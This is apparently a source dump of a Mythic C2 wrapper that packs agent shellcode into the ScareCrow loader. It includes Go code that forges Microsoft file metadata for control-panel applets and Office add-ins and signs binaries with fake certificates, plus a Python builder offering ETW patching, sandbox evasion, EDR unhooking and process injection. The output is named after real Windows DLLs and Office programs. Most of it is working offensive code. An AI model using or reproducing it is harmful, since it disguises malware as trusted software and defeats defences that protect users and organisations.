904 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
905 | vi.StringFileInfo.OriginalFilename = "POWERCFG.CPL.MUI"
906 | vi.FixedFileInfo.ProductVersion.Patch = 18362
907 | vi.FixedFileInfo.ProductVersion.Major = 10
908 | vi.FixedFileInfo.ProductVersion.Minor = 0
909 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
910 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
911 | vi.FixedFileInfo.FileVersion.Major = 10
912 | vi.FixedFileInfo.FileVersion.Minor = 0
913 | vi.FixedFileInfo.FileVersion.Patch = 18362
914 | vi.FixedFileInfo.FileVersion.Build = 1
915 | vi.StringFileInfo.InternalName = "powercfg.cpl"
916 | }
917 | if name == "speech" {
918 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
919 | vi.StringFileInfo.InternalName = "sapi.cpl"
920 | vi.StringFileInfo.FileDescription = "Speech UX Control Panel"
921 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
922 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
923 | vi.StringFileInfo.OriginalFilename = "sapi.cpl.mui"
924 | vi.FixedFileInfo.ProductVersion.Patch = 18362
925 | vi.FixedFileInfo.ProductVersion.Major = 10
926 | vi.FixedFileInfo.ProductVersion.Minor = 0
927 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
928 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
929 | vi.FixedFileInfo.FileVersion.Major = 10
930 | vi.FixedFileInfo.FileVersion.Minor = 0
931 | vi.FixedFileInfo.FileVersion.Patch = 18362
932 | vi.FixedFileInfo.FileVersion.Build = 1
933 | vi.StringFileInfo.InternalName = "sapi.cpl"
934 | }
935 |
936 | if name == "system" {
937 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
938 | vi.StringFileInfo.InternalName = "sysdm.cpl"
939 | vi.StringFileInfo.FileDescription = "System Applet for the Control Panel"
940 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
941 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
942 | vi.StringFileInfo.OriginalFilename = "sysdm.cpl.mui"
943 | vi.FixedFileInfo.ProductVersion.Patch = 18362
944 | vi.FixedFileInfo.ProductVersion.Major = 10
945 | vi.FixedFileInfo.ProductVersion.Minor = 0
946 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
947 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
948 | vi.FixedFileInfo.FileVersion.Major = 10
949 | vi.FixedFileInfo.FileVersion.Minor = 0
950 | vi.FixedFileInfo.FileVersion.Patch = 18362
951 | vi.FixedFileInfo.FileVersion.Build = 1
952 | vi.StringFileInfo.InternalName = "sysdm.cpl"
953 | }
954 | if name == "Tablet" {
955 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
956 | vi.StringFileInfo.InternalName = "TabletPC.cpl"
957 | vi.StringFileInfo.FileDescription = "Tablet PC Control Panel"
958 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
959 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
960 | vi.StringFileInfo.OriginalFilename = "tabletpc.cpl.mui"
961 | vi.FixedFileInfo.ProductVersion.Patch = 18362
962 | vi.FixedFileInfo.ProductVersion.Major = 10
963 | vi.FixedFileInfo.ProductVersion.Minor = 0
964 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
965 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
966 | vi.FixedFileInfo.FileVersion.Major = 10
967 | vi.FixedFileInfo.FileVersion.Minor = 0
968 | vi.FixedFileInfo.FileVersion.Patch = 18362
969 | vi.FixedFileInfo.FileVersion.Build = 1
970 | vi.StringFileInfo.InternalName = "TabletPC.cpl"
971 | }
972 | if name == "telephone" {
973 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
974 | vi.StringFileInfo.InternalName = "telephon.cpl"
975 | vi.StringFileInfo.FileDescription = "Telephony Control Panel"
976 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
977 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
978 | vi.StringFileInfo.OriginalFilename = "telephon.cpl.mui"
979 | vi.FixedFileInfo.ProductVersion.Patch = 18362
980 | vi.FixedFileInfo.ProductVersion.Major = 10
981 | vi.FixedFileInfo.ProductVersion.Minor = 0
982 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
983 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
984 | vi.FixedFileInfo.FileVersion.Major = 10
985 | vi.FixedFileInfo.FileVersion.Minor = 0
986 | vi.FixedFileInfo.FileVersion.Patch = 18362
987 | vi.FixedFileInfo.FileVersion.Build = 1
988 | vi.StringFileInfo.InternalName = "telephon.cpl"
989 | }
990 | if name == "datetime" {
991 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
992 | vi.StringFileInfo.InternalName = "timedate.cpl"
993 | vi.StringFileInfo.FileDescription = "Time Date Control Panel Applet"
994 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
995 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
996 | vi.StringFileInfo.OriginalFilename = "timedate.cpl.mui"
997 | vi.FixedFileInfo.ProductVersion.Patch = 18362
998 | vi.FixedFileInfo.ProductVersion.Major = 10
999 | vi.FixedFileInfo.ProductVersion.Minor = 0
1000 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
1001 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
1002 | vi.FixedFileInfo.FileVersion.Major = 10
1003 | vi.FixedFileInfo.FileVersion.Minor = 0
1004 | vi.FixedFileInfo.FileVersion.Patch = 18362
1005 | vi.FixedFileInfo.FileVersion.Build = 1
1006 | vi.StringFileInfo.InternalName = "timedate.cpl"
1007 | }
1008 | if name == "winsec" {
1009 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1010 | vi.StringFileInfo.InternalName = "wscui.cpl"
1011 | vi.StringFileInfo.FileDescription = "Security and Maintenance"
1012 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
1013 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1014 | vi.StringFileInfo.OriginalFilename = "wscui.cpl.mui"
1015 | vi.FixedFileInfo.ProductVersion.Patch = 18362
1016 | vi.FixedFileInfo.ProductVersion.Major = 10
1017 | vi.FixedFileInfo.ProductVersion.Minor = 0
1018 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
1019 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
1020 | vi.FixedFileInfo.FileVersion.Major = 10
1021 | vi.FixedFileInfo.FileVersion.Minor = 0
1022 | vi.FixedFileInfo.FileVersion.Patch = 18362
1023 | vi.FixedFileInfo.FileVersion.Build = 1
1024 | vi.StringFileInfo.InternalName = "wscui.cpl"
1025 | }
1026 | if name == "Timesheet" {
1027 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1028 | vi.StringFileInfo.InternalName = "Timesheet.xll "
1029 | vi.StringFileInfo.FileDescription = "Timesheet ToolPak"
1030 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1031 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1032 | vi.StringFileInfo.OriginalFilename = "Timesheet.xll"
1033 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1034 | vi.FixedFileInfo.ProductVersion.Major = 16
1035 | vi.FixedFileInfo.ProductVersion.Minor = 0
1036 | vi.StringFileInfo.ProductName = "Microsoft Office"
1037 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1038 | vi.FixedFileInfo.FileVersion.Major = 16
1039 | vi.FixedFileInfo.FileVersion.Minor = 0
1040 | vi.FixedFileInfo.FileVersion.Patch = 10001
1041 | vi.FixedFileInfo.FileVersion.Build = 10000
1042 | vi.StringFileInfo.InternalName = "Timesheet.xll"
1043 | }
1044 | if name == "Reports" {
1045 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1046 | vi.StringFileInfo.InternalName = "Reports.xll "
1047 | vi.StringFileInfo.FileDescription = "Report ToolPak"
1048 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1049 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1050 | vi.StringFileInfo.OriginalFilename = "Reports.xll"
1051 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1052 | vi.FixedFileInfo.ProductVersion.Major = 16
1053 | vi.FixedFileInfo.ProductVersion.Minor = 0
1054 | vi.StringFileInfo.ProductName = "Microsoft Office"
1055 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1056 | vi.FixedFileInfo.FileVersion.Major = 16
1057 | vi.FixedFileInfo.FileVersion.Minor = 0
1058 | vi.FixedFileInfo.FileVersion.Patch = 10001
1059 | vi.FixedFileInfo.FileVersion.Build = 10000
1060 | vi.StringFileInfo.InternalName = "Reports.xll"
1061 | }
1062 | if name == "Zoom" {
1063 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1064 | vi.StringFileInfo.InternalName = "Zoom.xll"
1065 | vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak"
1066 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1067 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1068 | vi.StringFileInfo.OriginalFilename = "Zoom.xll"
1069 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1070 | vi.FixedFileInfo.ProductVersion.Major = 16
1071 | vi.FixedFileInfo.ProductVersion.Minor = 0
1072 | vi.StringFileInfo.ProductName = "Microsoft Office"
1073 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1074 | vi.FixedFileInfo.FileVersion.Major = 16
1075 | vi.FixedFileInfo.FileVersion.Minor = 0
1076 | vi.FixedFileInfo.FileVersion.Patch = 10001
1077 | vi.FixedFileInfo.FileVersion.Build = 10000
1078 | vi.StringFileInfo.InternalName = "Zoom.xll"
1079 | }
1080 | if name == "Updates" {
1081 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1082 | vi.StringFileInfo.InternalName = "Updates.xll "
1083 | vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak"
1084 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1085 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1086 | vi.StringFileInfo.OriginalFilename = "Updates.xll"
1087 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1088 | vi.FixedFileInfo.ProductVersion.Major = 16
1089 | vi.FixedFileInfo.ProductVersion.Minor = 0
1090 | vi.StringFileInfo.ProductName = "Microsoft Office"
1091 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1092 | vi.FixedFileInfo.FileVersion.Major = 16
1093 | vi.FixedFileInfo.FileVersion.Minor = 0
1094 | vi.FixedFileInfo.FileVersion.Patch = 10001
1095 | vi.FixedFileInfo.FileVersion.Build = 10000
1096 | vi.StringFileInfo.InternalName = "Updates.xll"
1097 | }
1098 |
1099 | if name == "Calendar" {
1100 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1101 | vi.StringFileInfo.InternalName = "Calendar.xll "
1102 | vi.StringFileInfo.FileDescription = "Calendar ToolPak"
1103 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1104 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1105 | vi.StringFileInfo.OriginalFilename = "Calendar.xll"
1106 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1107 | vi.FixedFileInfo.ProductVersion.Major = 16
1108 | vi.FixedFileInfo.ProductVersion.Minor = 0
1109 | vi.StringFileInfo.ProductName = "Microsoft Office"
1110 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1111 | vi.FixedFileInfo.FileVersion.Major = 16
1112 | vi.FixedFileInfo.FileVersion.Minor = 0
1113 | vi.FixedFileInfo.FileVersion.Patch = 10001
1114 | vi.FixedFileInfo.FileVersion.Build = 10000
1115 | vi.StringFileInfo.InternalName = "Calendar.xll"
1116 | }
1117 | if name == "Memo" {
1118 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1119 | vi.StringFileInfo.InternalName = "Memo.xll "
1120 | vi.StringFileInfo.FileDescription = "Memo ToolPak"
1121 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1122 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1123 | vi.StringFileInfo.OriginalFilename = "Memo.xll"
1124 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1125 | vi.FixedFileInfo.ProductVersion.Major = 16
1126 | vi.FixedFileInfo.ProductVersion.Minor = 0
1127 | vi.StringFileInfo.ProductName = "Microsoft Office"
1128 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1129 | vi.FixedFileInfo.FileVersion.Major = 16
1130 | vi.FixedFileInfo.FileVersion.Minor = 0
1131 | vi.FixedFileInfo.FileVersion.Patch = 10001
1132 | vi.FixedFileInfo.FileVersion.Build = 10000
1133 | vi.StringFileInfo.InternalName = "Memo.xll"
1134 | }
1135 | if name == "Desk" {
1136 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1137 | vi.StringFileInfo.InternalName = "Desk.xll "
1138 | vi.StringFileInfo.FileDescription = "Office Desktop ToolPak"
1139 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1140 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1141 | vi.StringFileInfo.OriginalFilename = "Desk.xll"
1142 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1143 | vi.FixedFileInfo.ProductVersion.Major = 16
1144 | vi.FixedFileInfo.ProductVersion.Minor = 0
1145 | vi.StringFileInfo.ProductName = "Microsoft Office"
1146 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1147 | vi.FixedFileInfo.FileVersion.Major = 16
1148 | vi.FixedFileInfo.FileVersion.Minor = 0
1149 | vi.FixedFileInfo.FileVersion.Patch = 10001
1150 | vi.FixedFileInfo.FileVersion.Build = 10000
1151 | vi.StringFileInfo.InternalName = "Desk.xll"
1152 | }
1153 |
1154 | if name == "Appwiz" {
1155 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
1156 | vi.StringFileInfo.InternalName = "Appwiz.xll "
1157 | vi.StringFileInfo.FileDescription = "Application Installer ToolPak"
1158 | vi.StringFileInfo.FileVersion = "16.0.10001.10000"
1159 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
1160 | vi.StringFileInfo.OriginalFilename = "Appwiz.xll"
1161 | vi.FixedFileInfo.ProductVersion.Patch = 10001
1162 | vi.FixedFileInfo.ProductVersion.Major = 16
1163 | vi.FixedFileInfo.ProductVersion.Minor = 0
1164 | vi.StringFileInfo.ProductName = "Microsoft Office"
1165 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000"
1166 | vi.FixedFileInfo.FileVersion.Major = 16
1167 | vi.FixedFileInfo.FileVersion.Minor = 0
1168 | vi.FixedFileInfo.FileVersion.Patch = 10001
1169 | vi.FixedFileInfo.FileVersion.Build = 10000
1170 | vi.StringFileInfo.InternalName = "Appwiz.xll"
1171 | }
1172 | }
1173 | vi.VarFileInfo.Translation.LangID = goversioninfo.LangID(1033)
1174 | vi.VarFileInfo.Translation.CharsetID = goversioninfo.CharsetID(1200)
1175 |
1176 | vi.Build()
1177 | vi.Walk()
1178 |
1179 | var archs []string
1180 | archs = []string{"amd64"}
1181 | for _, item := range archs {
1182 | fileout := "resource_windows.syso"
1183 | if err := vi.WriteSyso(fileout, item); err != nil {
1184 | log.Printf("Error writing syso: %v", err)
1185 | os.Exit(3)
1186 | }
1187 | }
1188 | fmt.Println("[+] Created Embedded Resource File With " + name + "'s Properties")
1189 | return name
1190 | }
1191 |
1192 | func Signer(domain string, password string, valid string, inputFile string) {
1193 | outFile := inputFile
1194 |
1195 | if valid != "" {
1196 | fmt.Println("[*] Signing " + inputFile + " With a Valid Cert " + valid)
1197 | os.Rename(inputFile, inputFile+".old")
1198 | inputFile = inputFile + ".old"
1199 | SignExecutable(password, valid, inputFile, outFile)
1200 |
1201 | } else {
1202 | password := VarNumberLength(8, 12)
1203 | pfx := domain + ".pfx"
1204 | fmt.Println("[*] Signing " + inputFile + " With a Fake Cert")
1205 | os.Rename(inputFile, inputFile+".old")
1206 | inputFile = inputFile + ".old"
1207 | GenerateCert(domain, inputFile)
1208 | GeneratePFK(password, domain)
1209 | SignExecutable(password, pfx, inputFile, outFile)
1210 | }
1211 |
1212 | os.Remove(domain + ".pem")
1213 | os.Remove(domain + ".key")
1214 | os.Remove(domain + ".pfx")
1215 | fmt.Println("[+] Signed File Created")
1216 |
1217 | }
1218 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/main.json:
--------------------------------------------------------------------------------
1 | {
2 | "FixedFileInfo": {
3 | "FileVersion": {
4 | "Major": 1,
5 | "Minor": 0,
6 | "Patch": 0,
7 | "Build": 0
8 | },
9 | "ProductVersion": {
10 | "Major": 1,
11 | "Minor": 0,
12 | "Patch": 0,
13 | "Build": 0
14 | }
15 | },
16 | "StringFileInfo": {
17 | "CompanyName": "Microsoft Corporation",
18 | "FileDescription": "Microsoft Corporation",
19 | "FileVersion": "Microsoft Corporation",
20 | "InternalName": "test",
21 | "LegalCopyright": "Microsoft Corporation",
22 | "OriginalFilename": "Microsoft Corporation",
23 | "ProductName": "Microsoft Corporation",
24 | "ProductVersion": "Microsoft Corporation"
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/agent_functions/__init__.py:
--------------------------------------------------------------------------------
1 | import glob
2 | from os.path import basename
3 |
4 | # Get file paths of all modules.
5 | modules = glob.glob("agent_functions/*.py")
6 | __all__ = [basename(x)[:-3] for x in modules if x != "__init__.py"]
7 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/agent_functions/builder.py:
--------------------------------------------------------------------------------
1 | from mythic_payloadtype_container.PayloadBuilder import *
2 | from mythic_payloadtype_container.MythicCommandBase import *
3 | import asyncio
4 | import os
5 | import tempfile
6 | from distutils.dir_util import copy_tree
7 | import base64
8 |
9 |
10 | class ScarecrowWrapper(PayloadType):
11 | name = "scarecrow_wrapper"
12 | file_extension = "exe"
13 | author = "Kyle Avery"
14 | supported_os = [SupportedOS.Windows]
15 | wrapper = True
16 | wrapped_payloads = []
17 | note = ""
18 | supports_dynamic_loading = False
19 | build_parameters = {
20 | "loader": BuildParameter(
21 | name="loader",
22 | parameter_type=BuildParameterType.ChooseOne,
23 | description="Loader - Sets the type of process that will sideload the malicious payload. Note: Binary, Control, and DLL loaders require shellcode as input while Excel, Msiexec, and Wscript loaders require a PE file.",
24 | choices=["control", "binary", "dll"],
25 | ),
26 | "etw": BuildParameter(
27 | name="etw",
28 | parameter_type=BuildParameterType.ChooseOne,
29 | description="ETW - Enables ETW patching to prevent ETW events from being generated.",
30 | choices=["true", "false"],
31 | ),
32 | "console": BuildParameter(
33 | name="console",
34 | parameter_type=BuildParameterType.ChooseOne,
35 | description="Console (Only for Binary Payloads) - Generates verbose console information when the payload is executed. This will disable the hidden window feature.",
36 | choices=["true", "false"],
37 | ),
38 | "sandbox": BuildParameter(
39 | name="sandbox",
40 | parameter_type=BuildParameterType.ChooseOne,
41 | description="Sandbox - Enables sandbox evasion using IsDomainedJoined calls.",
42 | choices=["true", "false"],
43 | ),
44 | "unmodified": BuildParameter(
45 | name="unmodified",
46 | parameter_type=BuildParameterType.ChooseOne,
47 | description="Unmodified - (Only for DLL Payloads) When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.",
48 | choices=["true", "false"],
49 | default_value="false",
50 | ),
51 | "injection": BuildParameter(
52 | name="injection",
53 | parameter_type=BuildParameterType.String,
54 | required=False,
55 | description="Injection - Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path).",
56 | default_value="",
57 | ),
58 | "domain": BuildParameter(
59 | name="domain",
60 | required=True,
61 | parameter_type=BuildParameterType.String,
62 | description="Domain - The domain name to use for creating a fake code signing cert.",
63 | default_value="www.acme.com",
64 | ),
65 | }
66 | c2_profiles = []
67 |
68 | async def build(self) -> BuildResponse:
69 | # this function gets called to create an instance of your payload
70 | resp = BuildResponse(status=BuildStatus.Error)
71 | output = ""
72 | try:
73 | if(self.get_parameter("loader") != "dll" and self.get_parameter("unmodified") == "true"):
74 | resp.build_stderr = "Cannot use Unmodified option with a loader type other than DLL!"
75 | return resp
76 | agent_build_path = tempfile.TemporaryDirectory(suffix=self.uuid).name
77 | # shutil to copy payload files over
78 | copy_tree(self.agent_code_path, agent_build_path)
79 | working_path = "{}/original.exe".format(agent_build_path)
80 | output_path ="{}/output.exe".format(agent_build_path)
81 |
82 | with open(str(working_path), "wb") as f:
83 | f.write(base64.b64decode(self.wrapped_payload))
84 | with open(str(working_path), "rb") as f:
85 | header = f.read(2)
86 | if header == b"\x4d\x5a": # if PE file
87 | resp.build_stderr = "Supplied payload is a PE instead of raw shellcode."
88 | return resp
89 |
90 | command = "cd {}/ScareCrow/; go build; chmod +x ScareCrow; ./ScareCrow ".format(agent_build_path, agent_build_path)
91 | command += "-I {} -Loader {}{}{}{}{}{}".format(
92 | working_path,
93 | self.get_parameter("loader"),
94 | " -etw" if self.get_parameter("etw") == "true" else "",
95 | " -console" if self.get_parameter("console") == "true" else "",
96 | " -injection {}".format(self.get_parameter("injection")) if self.get_parameter("injection") != "" else "",
97 | " -domain {}".format(self.get_parameter("domain")) if self.get_parameter("domain") != "" else "",
98 | " -sandbox" if self.get_parameter("sandbox") == "true" else "",
99 | " -unmodified" if self.get_parameter("unmodified") == "true" else "",
100 | )
101 |
102 | proc = await asyncio.create_subprocess_shell(
103 | command,
104 | stdout=asyncio.subprocess.PIPE,
105 | stderr=asyncio.subprocess.PIPE,
106 | cwd=agent_build_path,
107 | )
108 | stdout, stderr = await proc.communicate()
109 | if stdout:
110 | output += f"[stdout]\n{stdout.decode()}"
111 | if stderr:
112 | output += f"[stderr]\n{stderr.decode()}"
113 |
114 | if(self.get_parameter("loader") == "control"):
115 | names = ["appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"]
116 | extension = ".cpl"
117 | elif(self.get_parameter("loader") == "binary"):
118 | names = ["Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"]
119 | extension = ".exe"
120 | elif(self.get_parameter("loader") == "dll"):
121 | names = ["apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"]
122 | extension = ".dll"
123 |
124 | for name in names:
125 | output_name = name + extension
126 | output_path = "{}/ScareCrow/{}".format(agent_build_path, output_name)
127 | if os.path.exists(output_path):
128 | resp.payload = open(output_path, "rb").read()
129 | resp.status = BuildStatus.Success
130 | resp.build_message = "Command: " + command + "\n" + "New ScareCrow payload created! - {}".format(output_name)
131 | return resp
132 | resp.payload = b""
133 | resp.build_stderr = "Failed, output: " + output + "\n Output path: " + output_path
134 | except Exception as e:
135 | raise Exception(str(e) + "\n" + output)
136 | return resp
137 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/mythic_service.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from mythic_payloadtype_container import mythic_service
3 | mythic_service.start_service_and_heartbeat()
4 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/payload_service.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | cd /Mythic/mythic
4 |
5 | export PYTHONPATH=/Mythic:/Mythic/mythic
6 |
7 | python3.8 mythic_service.py
8 |
--------------------------------------------------------------------------------
/Payload_Type/scarecrow_wrapper/mythic/rabbitmq_config.json:
--------------------------------------------------------------------------------
1 | {
2 | "username": "mythic_user",
3 | "password": "mythic_password",
4 | "virtual_host": "mythic_vhost",
5 | "host": "127.0.0.1",
6 | "name": "hostname",
7 | "container_files_path": "/Mythic/"
8 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ScareCrow Wrapper
2 | A wrapper payload for [Mythic](https://github.com/its-a-feature/Mythic) that wraps any agent shellcode with the [ScareCrow](https://github.com/optiv/ScareCrow) loader. This wrapper currently supports CPL, EXE, and DLL payload types from ScareCrow.
3 |
4 | ## Usage
5 | In Mythic, go to Create Components > Create Wrapper and then select "scarecrow_wrapper". Select/input the desired configuration options, and then select the payload you would like to wrap. Once the generation is complete, go to Operational Views > Created Payloads to download the output file. The intended filename can be seen in Payload Actions > View Build Message.
6 |
7 | ## How to install an agent in this format within Mythic
8 |
9 | When it's time for you to test out your install or for another user to install your agent, it's pretty simple. Within Mythic you can run the `mythic-cli` binary to install this in one of three ways:
10 |
11 | * `sudo ./mythic-cli install github https://github.com/user/repo` to install the main branch
12 | * `sudo ./mythic-cli install github https://github.com/user/repo branchname` to install a specific branch of that repo
13 | * `sudo ./mythic-cli install folder /path/to/local/folder/cloned/from/github` to install from an already cloned down version of an agent repo
14 |
15 | Now, you might be wondering _when_ should you or a user do this to properly add your agent to their Mythic instance. There's no wrong answer here, just depends on your preference. The three options are:
16 |
17 | * Mythic is already up and going, then you can run the install script and just direct that agent's containers to start (i.e. `sudo ./mythic-cli payload start agentName` and if that agent has its own special C2 containers, you'll need to start them too via `sudo ./mythic-cli c2 start c2profileName`).
18 | * Mythic is already up and going, but you want to minimize your steps, you can just install the agent and run `sudo ./mythic-cli mythic start`. That script will first _stop_ all of your containers, then start everything back up again. This will also bring in the new agent you just installed.
19 | * Mythic isn't running, you can install the script and just run `sudo ./mythic-cli mythic start`.
20 |
21 |
--------------------------------------------------------------------------------
/agent_icons/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/agent_icons/.keep
--------------------------------------------------------------------------------
/config.json:
--------------------------------------------------------------------------------
1 | {
2 | "exclude_payload_type": false,
3 | "exclude_c2_profiles": false,
4 | "exclude_documentation_payload": false,
5 | "exclude_documentation_c2": false,
6 | "exclude_agent_icons": false
7 | }
8 |
--------------------------------------------------------------------------------
/documentation-c2/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-c2/.keep
--------------------------------------------------------------------------------
/documentation-payload/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-payload/.keep
--------------------------------------------------------------------------------
/documentation-wrapper/.keep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/documentation-wrapper/.keep
--------------------------------------------------------------------------------